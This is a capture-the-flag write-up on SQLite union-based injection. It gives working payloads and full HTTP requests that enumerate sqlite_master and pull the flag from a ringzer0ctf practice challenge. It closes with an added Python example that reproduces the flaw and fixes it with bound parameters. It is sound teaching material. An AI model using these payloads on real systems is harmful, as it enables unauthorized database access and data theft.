
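SQLite injection

Manual SQLite injection works much like MySQL injection, except that the functions are not interchangeable and the way database names and column names are queried differs.

Only sqlite_master and the current database exist in a SQLite database.

Querying the current table name

index.php?id=1 union select 1,name,3,4 from sqlite_master where type='table' limit 0,1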

Querying the column names

index.php?id=1 union select 1,sql,3,4 from sqlite_master where type='table' and name='flag'

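Challenge walkthrough

https://ringzer0ctf.com/challenges/40/?id=MQ==

This challenge base64-encodes the id parameter and is vulnerable to SQLite injection. According to the challenge hint, id can be closed with ).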


Querying the table name

GET /challenges/40/?id=2) union select name,2,3 from sqlite_master where type='table' limit 0,1-- HTTP/1.1
Host: ringzer0ctf.com
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


Querying the column names

The query result is the statement that created the table.

GET /challenges/40/?id=2) union select sql,2,3 from sqlite_master where type='table' and name='flag'-- HTTP/1.1
Host: ringzer0ctf.com
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


Finally, the flag can be queried.

GET /challenges/40/?id=2) union select content,2,3 from flag limit 0,1-- HTTP/1.1
Host: ringzer0ctf.com
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

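The root cause behind the walkthrough above and its fix, as an added example that is not from the original post or the challenge's own code. It is a Python sqlite3 sketch in which the table news, its columns and the query shape WHERE (id = ...) are assumptions; only the flag table, its content column and the payload come from the walkthrough.

```python
import base64
import re
import sqlite3

# Payload quoted from the walkthrough above (the column-name step).
PAGE_PAYLOAD = "2) union select sql,2,3 from sqlite_master where type='table' and name='flag'--"

def make_db():
    # Constructed sample data; table "news" and its columns are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'hello', 'first'), (2, 'world', 'second');
        CREATE TABLE flag (content TEXT);
        INSERT INTO flag VALUES ('FLAG-constructed-sample');
    """)
    return db

def encode_id(value):
    return base64.b64encode(value.encode()).decode()

def decode_id(b64_id):
    # Base64 is an encoding, not a filter: the decoded text is still untrusted.
    return base64.b64decode(b64_id, validate=True).decode("utf-8")

def lookup_vulnerable(db, b64_id):
    # Assumed "before" shape: decoded id concatenated inside parentheses,
    # so ")" closes the condition and "--" comments out the trailing ")".
    sql = "SELECT title, id, body FROM news WHERE (id = " + decode_id(b64_id) + ")"
    return db.execute(sql).fetchall()

def lookup_hardened(db, b64_id):
    # Allow-list the decoded value, then bind it instead of concatenating.
    raw = decode_id(b64_id)
    if not re.fullmatch(r"[0-9]{1,9}", raw):
        raise ValueError("id must be a short decimal integer")
    sql = "SELECT title, id, body FROM news WHERE (id = ?)"
    return db.execute(sql, (int(raw),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, encode_id(PAGE_PAYLOAD)))  # schema leaks
    print(lookup_hardened(db, "MQ=="))                      # normal lookup
    try:
        lookup_hardened(db, encode_id(PAGE_PAYLOAD))
    except ValueError as exc:
        print("rejected:", exc)
```

Binding the value with ? is what closes the hole; the integer allow-list is an extra check that rejects malformed ids before they reach the database.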